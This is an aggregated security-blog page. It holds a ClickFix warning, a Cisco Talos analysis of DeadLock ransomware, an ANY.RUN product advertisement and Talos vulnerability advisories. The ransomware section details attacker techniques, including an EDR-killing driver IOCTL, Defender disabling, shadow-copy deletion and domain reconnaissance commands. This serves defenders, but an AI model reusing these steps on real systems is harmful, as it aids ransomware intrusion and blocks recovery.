If any website, instant message, document, or chat asks you to run any commands — like pressing Win+R or Command+Space and then launching PowerShell or Terminal — don’t. You’re very likely facing a ClickFix attack. Attackers typically try to draw users in by urging them to fix a “problem” on their computer, neutralize a “virus”, “prove they are not a robot”, or “update their browser or OS now”. However, a more neutral-sounding option like “install this new, trending tool” is also possible.
Never follow any guides you didn’t ask for and don’t fully understand.
The easiest thing to do is immediately close the website or delete the message with these instructions. But if the task seems important, and you can’t figure out the instructions you’ve just received, consult someone knowledgeable. A second option is to simply paste the suggested commands into a chat with an AI bot, and ask it to explain what the code does and whether it’s dangerous. ChatGPT typically handles this task fairly well.
If you ask ChatGPT whether you should follow the instructions you received, it will answer that it’s not safe
How else do malicious actors use AI for deception?
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-09 11:06:412025-12-09 11:06:41The AMOS infostealer is piggybacking ChatGPT’s chat-sharing feature | Kaspersky official blog
While tracking ransomware activities, Cisco Talos uncovered new tactics, techniques, and procedures (TTPs) linked to a financially motivated threat actor targeting victims with DeadLock ransomware.
The actor used the Bring Your Own Vulnerable Driver (BYOVD) technique with a previously unknown loader to exploit the Baidu Antivirus driver vulnerability (CVE-2024-51324), enabling the termination of endpoint detection and response (EDR) processes.
The actor ran a PowerShell script that bypasses User Account Control (UAC), disables Windows Defender, terminates various security, backup, and database services, and deletes all volume shadow copies to prevent system recovery.
The DeadLock ransomware targets Windows machines with a custom stream cipher encryption algorithm that uses time-based cryptographic keys to encrypt files.
This custom encryption method allows DeadLock ransomware to effectively encrypt different file types in enterprise environments while preventing system corruption through selective targeting and anti-forensics techniques, which complicate recovery.
Talos observed a threat actor leveraging a BYOVD technique to disable endpoint detection and escalate privileges in an attack that eventually delivered DeadLock ransomware as the payload.
The attack relied on “BdApiUtil.sys”, a legitimate Baidu Antivirus driver containing an Improper Privilege Management vulnerability with CVE-2024-51324—which the actor disguised using the file name “DriverGay.sys”. This Improper Privilege Management vulnerability exposes a critical function in the driver program that allows unprivileged users to terminate any process on the system at the kernel level.
The attack began when the actor dropped the loader (using the file name “EDRGay.exe”) and the vulnerable driver into the victim’s Videos folder and ran the loader. The loader, running in user mode, initializes the driver and establishes a connection via the CreateFile() Windows API. It specifies the driver’s real device name (“\.BdApiUtil”) to obtain a handle which essentially acts as a “ticket” to authorize future communication between the loader and the driver.
Once connected, the loader enumerates running system processes to identify the process ID (PID) of the target antivirus or EDR solution. To trigger the exploit, it calls the DeviceIOControl() function, passing the target PID along with the specific I/O Control Code (IOCTL) 0x800024b4.
This 32-bit IOCTL value is structured to instruct the driver exactly how to operate:
Device Type: 0x8000
Access: 0x0 (FILE_ANY_ACCESS)
Method: 0x0 (METHOD_BUFFERED)
Function Code: 0x92D
Figure 1. Function snippet of the loader, EDRGay, loading the driver and sending the IOCTL command.
Upon receiving the request, the driver decodes the function code 0x92D as a “terminate process” command. Due to the CVE-2024-51324 vulnerability, the driver fails to validate if the user-mode program has the necessary permissions to make this request. Because the driver operates in kernel mode with the highest system privileges, it blindly accepts the command and executes ZwTerminateProcess(), instantly killing the targeted security service.
Figure 2. Function snippets of vulnerable drivers for terminating the targeted processes.
Talos observed that the threat actor executed a PowerShell script in the victim’s machine before the encryption process. The PowerShell script is a pre-encryption preparation component of the attack that the actor used to bypass the UAC, disable the detection services, and inhibit the system recovery of the victim machine.
The script implements aprivilege escalation mechanism through the Test-Admin function that automatically detects current user permissions and re-launches itself with administrative privileges using the Verb RunAs parameter, ensuring it operates with the necessary system-level access required for service manipulation and shadow copy deletion. This elevation technique bypasses UAC prompts through the exec bypass execution policy override, allowing the script to execute without standard PowerShell security restrictions.
Figure 3. Snippet of the PowerShell script escalating the privilege.
The main functionality of the script centers around service termination, designed to disable security software, backup systems, and database applications that could affect the ransomware encryption process. It includes an extensive exclusion list of Windows services that must remain operational to maintain basic functionality of the system for ransom payment discussions and processing, including core networking services (Winrm, Dns, Dhcp), authentication mechanisms (Kdc, Netlogon, Lsm), and essential system components (Rpcss, Plugplay, Eventlog).
The script targets the running services outside the exclusion list, which not only terminates active services but permanently disables their startup configuration to prevent automatic recovery during system reboots.
The script executes commands to delete all volume shadow copy snapshots, eliminating the victim’s ability to recover the system. It has a self-deletion mechanism that removes the traces of its existence in the victim machine, hindering the forensic analysis efforts.
Figure 4. Snippet of the PowerShell script deleting the shadowcopy.
Talos found that the threat actor disabled several other commands in the script that are designed to eliminate network shares and terminate system process and services through alternative methods. The network share deletion commands target specific Windows file sharing infrastructure through Windows Management Instrumentation (WMI) queries, removing all standard network shares while preserving administrative and domain controller shares, effectively isolating the infected system from network file sharing capabilities that could be used for lateral movement or data exfiltration activities. Subsequently, there are commands that target print-related shares by removing print$ and prnproc$ administrative shares, disrupting network printing services that could potentially be used as communication channels or recovery mechanisms.
There are also process termination commands which are designed to directly kill the PIDs associated with the running services that are not on the exclusion list, bypassing standard service shutdown procedures that would trigger alerts before termination.
Talos spotted a service startup modification command in the script that shows the advanced Windows service management techniques used to permanently alter service startup configurations, ensuring that even after system reboots, targeted services remain disabled.
We also observed a file-based exclusion technique in the final section of the script where it reads the exclusion service names from an external file “run[.]txt”, indicating the dynamic control of the service exclusion list depending upon the targeted environments.
Figure 5. Snippet of PowerShell script with alternative methods of terminating the targeted services.
Other notable TTPs
Talos discovered several other notable TTPs of the DeadLock ransomware attacks from the telemetry data. Our assessment revealed that the actor had access to the victim’s network five days prior to the ransomware deployment.
Talos suspects that the threat actor leverages the compromised valid accounts to gain access to the victim’s machine based on telemetry data.
Upon gaining the system access, we observed that the threat actor attempted toenable and expose remote access services on the victim machine by using the reg add command to modify the fDenyTSConnections registry value, which directly enables the machine to accept Remote Desktop Protocol (RDP) connections. Then, the actor executed the netsh advfirewall command to create a new inbound firewall rule, opening TCP port 3389 to ensure RDP traffic isn’t blocked. Finally, they used sc config and sc start to change the RemoteRegistry service to on-demand and immediately start it, allowing them to query and modify the system’s registry from another machine for further reconnaissance and configuration modifications.
We assess that the threat actor, operating from a compromised user account, installed a new instance of AnyDesk on a specific host one day prior to an encryption event. This action was likely taken to establish persistent, remote access.
While other instances of AnyDesk were already present in the environment, this new installation was suspicious. The actor used a specific sequence of commands to silently install the software, configure it to start with Windows, and set up a password for unattended access, while disabling updates that might terminate the actor’s connection to the victim’s machine.
Talos observed several commands the actor executed for internal reconnaissance and lateral movement within the victim environment following the AnyDesk installation, highlighting their intent to discover and move to high-value targets.
The actor attempted to discover domain controllers, query the domain structure, and enumerate the privileged groups and their members. They performed a connectivity test using a ping command to see if a target machine was reachable and checked the logged-on user details by executing the Quser command.
Then, with the discovered internal IP addresses, the actor moved laterally by executing the mstsc command to start the Remote Desktop Protocol (RDP) session. They also executed the mmc.exe compmgmt.msc command, which is an alternative remote computer management command without a full interactive RDP session. Finally, the actor executed iexplore.exe, likely to access an internal web resource.
Nltest /dclist
Nltest
Nltest dclist: DC HOST NAME
Net local group /domain
Mstsc.exe /v:
Ping
Quser
iexplore.exe http: INTERNAL IP ADDRESS
mmc.exe compmgmt.msc /computer: INTERNAL IP ADDRESS
Talos observed that the actor modified the Windows Defender settings using legitimate Windows executable SystemSettingsAdminFlows.exe. By executing the following commands, the actor disabled Real-Time Protection (RTP) in Windows Defender. They subsequently disabled cloud-based protections through the command SpynetReporting 0, which stops the machine from sending threat reports to Microsoft. The command SubmitSamplesConsent 0 prevents Windows Defender from automatically submitting suspicious files for analysis.
Talos observed that the threat actor deployed DeadLock ransomware as the payload in their attack. DeadLock ransomware has been active since as early as July 2025 and, unlike other ransomware actors, this threat actor does not operate a data leak site. Instead, victims are persuaded to contact the threat actor operating the DeadLock ransomware via Session messenger.
The DeadLock ransomware encryptor is specifically designed to target the Windows environment. The encryptor binary was written in C++ and compiled in July 2025, indicating the start time of the threat actor’s operation.
Upon execution, the DeadLock ransomware immediately drops and executes an embedded batch script (.cmd) in the victim’s “ProgramData” folder. This script functions as a loader, first preparing the system by setting up the console code page to UTF-8 by executing the command chcp 65001. This step ensures that the ransom note can be displayed correctly, even with special or non-English characters. After configuring the environment, the script stealthily launches the main ransomware binary and then deletes itself to remove its tracks.
Figure 6. Malicious batch file that re-runs the ransomware binary.
The ransomware then uses a process hollowing technique to inject itself into the targeted process rundll32.exe, masquerading as a normal system process in the victim machine.
Ransomware configuration data
The DeadLock ransomware relies on a massive 8,888-byte configuration block embedded directly within its binary to dictate its entire operational strategy. Upon execution, the ransomware parses this data using pipe (|) delimiters and loads the structure into memory in the following format:
This key is coupled with specific timing parameters (1000, 0055242988), which are likely used to implement execution delays and initialize pseudo-random number generation seeds.
The configuration contains a comprehensive “kill list” designed to disable security controls, remote access tools, and file-locking applications.
The ransomware terminates standard Windows utilities (e.g., Explorer, PowerShell, Task Manager), alongside specific high-value targets:
Remote access: AnyDesk, RustDesk, Microsoft Remote Desktop connection (mstsc).
Cloud storage: Dropbox, OneDrive.
Security: Antimalware Service (msmpeng), SecurityHealthService, SmartScreen.
The ransomware targets services to release file handles and disable defenses, specifically:
Databases: Microsoft SQL Server (including named instances like MSSQL$VEEAMSQL2012), Sybase SQL Anywhere (dbsrv12), and MySQL (FishbowlMySQL).
Backup and recovery: Enterprise solutions including Veeam (VeeamTransportSvc), Veritas Backup Exec, Acronis, CA Arcserve, and Carbonite.
Security suites: Endpoint protection components from Symantec/Norton (ccEvtMgr, RTVscan), McAfee (MVArmor), and 360 Security defender (zhudongfangyu).
Business applications: Intuit QuickBooks, Microsoft Exchange, Apache Tomcat, and VMware tools (vmware-usbarbitator6s4).
To ensure the OS remains stable enough for the victim to pay the ransom, the configuration enforces strict exclusion lists:
Critical folders: $recycle.bin, Program Files, ProgramData, Windows, and System Volume Information.
File extensions: A vast list of executables, drivers, and system files, including .exe, .dll, .sys, .msi, .lnk, and .boot.
Critical files: Boot loaders and system configuration files, such as bootmgr, ntldr, ntuser.dat, and desktop.ini.
The configuration block also stores the full plaintext ransom note along with an HTML marker (<!doctype html>) indicates the ransomware is also capable of generating an HTML version of the note. Additionally, Talos observed a unique 64-character, SHA256-like hash value which likely serves as a specific campaign identifier or infection marker.
DeadLock ransomware encryption process
The Deadlock ransomware encryption operation is a sophisticated approach which includes recursive directory traversal, memory-mapped file I/O, custom stream cipher implementation, and multi-threaded processing to efficiently encrypt entire file systems while avoiding detections through custom cryptographic implementations rather than standard Windows cryptographic APIs.
Figure 8. DeadLock ransomware encryption process flow diagram.
The encryption orchestration function begins its operation with the recursive directory traversal to enumerate all accessible files on the target system while applying the exclusion filters from the parsed configuration data.
Then the encryption orchestration function executes another key generation function that relies on time-based seeding from system timers through the function GetSystemTimeAsFileTime along with complex mathematical operations producing 8-byte pseudo-random encryption key streams.
Finally, it executes the core encryption function which first performs a UTF-8 validation check on the file’s content and processes file data in 16-byte blocks. For each byte it applies to the stream cipher using the generated pseudo-random key stream, ultimately encrypting the file data in the memory and writing the encrypted result back to the filesystem. Then the ransomware renames the encrypted file by appending the hexadecimal identifier and the file extension “.dlock” to the encrypted files.
Figure 9. DeadLock ransomware’s core encryption function applies to a stream cipher algorithm to encrypt the targeted files.
To evade the automated sandbox analysis, the ransomware executes a delay function, which implements a 50-second delay before it initiates the encryption action.
Figure 10. Execution delay inclusion function of DeadLock ransomware.
During its execution, the DeadLock ransomware drops an icon file, Windows batch script, and a bitmap image file in the ProgramData folder of the victim machine.
Figure 11. Dropped files of DeadLock ransomware in the ProgramData folder.
Talos observed that the ransomware replaces the icon of encrypted files with a custom icon file by configuring the path of the dropped icon file to the file extension .dlock in the “DefaultIcon” registry key of the victim machine Software registry hive.
Figure 12. DeadLock ransomware icon file.
After encryption, the actor also changed the victim machine’s desktop wallpaper to a custom wallpaper and disabled the command line utilities in the victim machine.
Figure 13. DeadLock ransomware wallpaper.
The ransomware drops the ransom note in each of the folders in the victim machine where the targeted files have been encrypted.
Figure 14. DeadLock’s ransom note file.
The DeadLock ransom note displays an alarming claim of “military-grade encryption” followed by a six-step recovery process. The ransom note also describes the acceptance of ransom payment in Bitcoin or Monero and indicates warnings against file renaming or third-party decryption attempts. The personal identifier “READ ME.hex_identifier.txt” at the end of the ransom note is likely a victim identification marker.
The threat actor employs the Session messenger as their primary communication platform, leveraging its end-to-end encryption and anonymity features to evade law enforcement surveillance while maintaining victim contact through the session ID.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for the threats are: 65576, 65575 and 301358.
ClamAV detections are also available for this threat:
Win.Tool.EDRKiller-10058432-0
Win.Tool.VulnBaiduDriver-10058431-1
Ps.Tool.DeleteShadowCopies-10058429-0
Win.Ransomware.Deadlock-10058428-0
Indicators of compromise (IOCs)
The IOCs can also be found in our GitHub repository here.
Effective cyber security depends on knowing which risks matter most. ANY.RUN’s Threat Intelligence Lookup provides industry and geographic context, powered by live attack investigations from 15,000+ companies, that SOC teams need to prioritize alerts, IOCs, and threats with confidence and build their defense strategy for maximum ROI.
Here’s how.
Challenge: Context-free TI Wastes SOC Time
Most threat intelligence sources return long lists of IPs, domains, and hashes, but they rarely explain how those indicators map to a specific sector or region. SOC teams end up treating every threat as equally important, spreading detection and hunting efforts thin and burning time on noise instead of the threats that actually appear in their environment.
For MSSPs, the problem is even sharper: they serve clients from many fields at once. The lack of industry or geo context makes it hard to prioritize work and hard to prove value to clients who expect sector-aware monitoring.
Solution: Industry & Geo Threat Landscape for Every Indicator
Industry & geo threat landscape data for the Tycoon2FA phishkit
TI Lookup now adds an extra layer of context on top of every Premium search query. In addition to listing IOCs, IOAs, IOBs, and sandbox sessions, it builds a real-time snapshot of which industries and countries are most commonly associated with the threat or indicators you queried.
The functionality provides three key context fields:
Field
Description
Benefit
Risk score by industry
Likelihood (%) that the queried threat/indicator is linked to attacks on each industry based on the search results.
See how likely your industry toface similar threats to prioritize defenses.
Threat names
How often (%) each threat appears in the current search results.
Discover the most likely threats related to your query for focused investigation and response.
Submission countries
How often the queried threat/indicator appears in submissions from each country based on the search results.
See where relevant threats are reported the most to uncover geographic hotspots and trends.
TI Lookup now turns your threat landscape into a live, industry-aware radar. It shows exactly how a given threat or indicator maps to specific sectors and countries, so you see where it really matters for your business instead of drowning in generic feeds.
The threat landscape shifts. So should your SOC.
Gain industry & geo insights for focused action.
Powered by real-time analysis of attacks on 15,000 organizations worldwide, it helps you connect threats, techniques, and affected industries, surface niche campaigns, and act before they hit your environment.
How SOCs Use it in Daily Workflows
There are several use cases for TI Lookup’s threat landscape functionality.
1. Starting from a known threat
A Tier 2–3 analyst already knows the threat or malware family involved.
They open TI Lookup, search by threat name, and review the industry breakdown in the Threat names view.
The landscape view shows that Agent Tesla is related to malicious activity in industries like education, technologies, telecommunications, and finance. The analyst can see whether their own sector shows up or stays near zero.
If the match is strong, the analyst treats it as highly relevant, assesses risk, and pulls only the domains, IPs, and other artifacts that make sense for their company.
2. Starting from an industry
An analyst, a SOC lead, or even a CISO wants to see an existing threat landscape for their company’s sector. They query by industry to get a list of Threat names that most often appear in samples linked to that vertical.
TI Lookup sharing info on threats submitted in Germany and relevant for finance companies
For German companies in finance, the most relevant threats according to TI Lookup are Tycoon2FA, Zhong Stealer, PXA Stealer, and several others.
From there, the user can refine the query (for example, by a threat type) to uncover the most relevant connections for their environment.
TI Lookup also makes it possible to set up Query Updates that notify the users about new results for their queries. This way, they can continuously receive new info about threats related to the industry.
Subscribe to Query Updates and receive notifications for new results based on your search
3. Starting from any IOC or behavior
An analyst starts with any IOC, behavior, or pattern that is not explicitly tied to Industries or Threat names. Say your SIEM detects a suspicious connection. The SOC analyst in charge submits it to TI Lookup and instantly gets full context.
TI Lookup sharing verdict and related info on a domain
TI Lookup instantly shows that the indicator belongs to the Lumma Stealer and appears in threat samples related to telecommunications and technologies companies in Italy and the United States.
This insight helps the analyst judge how relevant and serious the activity is for their own organization or clients. It also guides the next actions: escalating the alert, looking for similar activity, collecting related artifacts, and updating detection rules.
4. Starting from an existing security gap
A CISO or SOC Head knows the company has already faced several incidents related to a certain type of threat. They can pivot on it and combine this with the industry and organization’s country.
Example:
Let’s say a security lead in a finance organization sees that the company struggles with phishing. With TI Lookup, they can uncover what common phishing attacks are analyzed by similar businesses in their country:
Overview of phishing threats submitted in Brazil, relevant for finance organizations
They receive the most common threat names (Tycoon2FA, Storm1747) and sandbox analyses of real-world threats with indicators. This becomes a live backlog for detection engineering, threat hunting hypotheses, and training cases tailored to that sector instead of generic global lists.
Next, the security lead works with the SOC to turn these threats into concrete actions: prioritizing detections and playbooks for the most common phishing families, rolling out focused awareness training, and tightening controls around the channels those campaigns abuse.
Benefits for SOCs and MSSPs
TI Lookup together with the new Industry & geo threat landscape functionality provide a significant value to security teams.
For CISOs and MSSP leads
Faster, scalable prioritization of threats per client segment (finance, healthcare, manufacturing, etc.).
Standardized rules and hunting scenarios by industry and country for consistent service quality.
Clear evidence in reports that monitoring accounts for sector and regional risk.
A managed security provider can group clients by industry and region and use TI Lookup to pull the most relevant threat names for each segment. This can help them standardize rule sets and hunting scenarios for finance, healthcare, manufacturing, and other spheres.
For any new threat, they can quickly check which industries and countries it most often appears in and flag the matching customers as higher risk. They then can export the associated domains, IPs, and other artifacts and roll out protections to all affected environments in one go.
For SOC leads
Quick view of which threats are truly applicable to the organization’s industry and geography.
Sharper focus for detections, playbooks, and training content around the most relevant threats.
Immediate access to domains/IPs/artifacts for blocking and hunting when a known threat appears.
A SOC lead can start by querying TI Lookup for their own industry and country to get a ranked list of the most applicable threat names. This immediately shows which families and campaigns should drive new detections, playbooks, and training.
When a known threat appears, they can use the same view to see which industries it is most often associated with. If their sector is high on the list, they can raise the priority, pull the related domains, IPs, and artifacts, and push them into blocking and hunting across their environment.
For SOC Tier 2–3 analysts
Less noisy TI and faster understanding of where each threat actually matters.
Simple pivots: from threat to industries/countries and from industries/countries to relevant threat names.
Rich artifacts to enrich cases, accelerating triage, incident response, and hunting accuracy.
Tier 2–3 analysts are often overwhelmed with alert noise and need to know whether a given threat actually matters for a specific case or industry. With TI Lookup, they can start from a threat name and immediately see how it breaks down by industries and countries, or start from an industry/country and get the most relevant threat names back.
For each query, they also receive concrete artifacts like domains, IPs, and other indicators to enrich their cases. This speeds up triage, incident response, and threat hunting, while making the recommendations they give to the SOC lead more accurate and grounded in real-world context.
How It Impacts Key Metrics
The industry & geo threat landscape in TI Lookup improves the SOC metrics that matter most by adding instant industry and country context to every search:
Shorter Mean Time to Detect: Analysts immediately see whether a threat is actually observed in their industry and regions, so they confirm real incidents faster instead of spending time qualifying generic indicators.
Faster Mean Time to Respond: Each relevant landscape slice comes with ready IOCs and behavior context from real sandbox runs, shortening investigation steps and helping teams move to containment and remediation sooner.
Lower false positive rate: Alerts tied to threats that never appear in the organization’s industry or geography can be safely downgraded, reducing noise and cutting time spent on benign events.
Wider detection coverage: Detection engineering uses industry and geo statistics from TI Lookup to prioritize rules and playbooks for the threats that most often impact similar organizations.
Better analyst performance per incident: With clearer relevance and richer context up front, analysts can close more meaningful cases per shift instead of circling around low-value alerts.
Try Threat Intelligence Lookup in Your SOC
TI Lookup with the geo & threat landscape functionality is available to all Premium subscription users. Contact us to request a trial access to see how our solution can accelerate and improve the work of your security team.
Prioritize risks by relevance. Act where it matters.
Try TI Lookup for industry & geo insights
Threat Intelligence Lookup reveals critical industry and geographic context in every threat search. Analysts can turn scattered IOCs into actionable insights that are relevant to your organization. Narrow the global threat landscape for more efficient proactive research and threat hunting.
Backed by real-time analysis from 15,000 organizations, TI Lookup helps teams prioritize faster, sharpen detection, reduce false positives, and improve MTTR. Security teams can finally focus on the threats most likely to impact their specific environment and proactively set up defenses.
About ANY.RUN
As a leading provider of interactive malware analysis and threat intelligence, ANY.RUN is trusted by over 500,000 analysts across 15,000 organizations worldwide. Its solutions enable teams to investigate threats in real time, trace full execution chains, and surface critical behaviors within seconds.
Safely detonate samples, interact with them as they run, and instantly pivot to network traces, file system changes, registry activity, and memory artifacts in ANY.RUN’s Interactive Sandbox. For threat intelligence insights, integrate TI Lookup and TI Feeds supplying enriched IOCs and automation-ready intelligence. No infrastructure maintenance is required.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-09 11:06:402025-12-09 11:06:40Track Evolving Cyber Threat Landscape for Your Industry & Country in Real Time
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed an out-of-bounds read vulnerability in PDF XChange Editor, and ten vulnerabilities in Socomec DIRIS Digiware M series and Easy Config products.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
PDF XChange vulnerabilities
Discovered by KPC of Cisco Talos.
PDF XChange Editor is freemium software used to create, edit, digitally sign, and otherwise handle PDF files. Talos discoveredTALOS-2025-2280 (CVE-2025-58113), an out-of-bounds read vulnerability in the EMF functionality of PDF-XChange Co. Ltd PDF-XChange Editor 10.7.3.401. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Socomec vulnerabilities
Discovered by Kelly Patterson of Cisco Talos.
Talos discovered nine vulnerabilities in the Socomec DIRIS Digiware M-70 version 1.6.9. DIRIS Digiware M series are multifunction communication gateways that act as a point of access to Digiware systems, combining power supply and communication control monitoring.
One disclosed vulnerability is also in the Socomec Easy Config System. This software is used to configure and monitor Socomec power monitoring and control equipment.
Socomec DIRIS Digiware M Series
TALOS-2024-2115 (CVE-2024-48894) is a cleartext transmission vulnerability. Specially crafted HTTP requests can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.
TALOS-2024-2116 (CVE-2024-53684) is a cross-site request forgery. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.
TALOS-2024-2118 (CVE-2024-49572) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service and weaken credentials, resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.
TALOS-2024-2119 (CVE-2024-48882) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.
TALOS-2025-2138 (CVE-2025-20085) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service and weaken credentials, resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.
TALOS-2025-2139 (CVE-2025-23417) is a denial-of-service vulnerability. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.
TALOS-2025-2248 (CVE-2025-54848-CVE-2025-54851) is a denial-of-service vulnerability in the Modbus TCP and Modbus RTU over TCP functionalities. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.
TALOS-2025-2251 (CVE-2025-55221-CVE-2025-55222) is a denial-of-service vulnerability in the Modbus TCP and Modbus RTU over TCP USB Function functionalities. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.
TALOS-2025-2152 (CVE-2025-26858) is a buffer overflow vulnerability in the Modbus TCP functionality. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.
Socomec Easy Config System
TALOS-2024-2117 (CVE-2024-45370) is an authentication bypass vulnerability in the User profile management functionality. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-04 21:06:382025-12-04 21:06:38Socomec DIRIS Digiware M series and Easy Config, PDF XChange Editor vulnerabilities
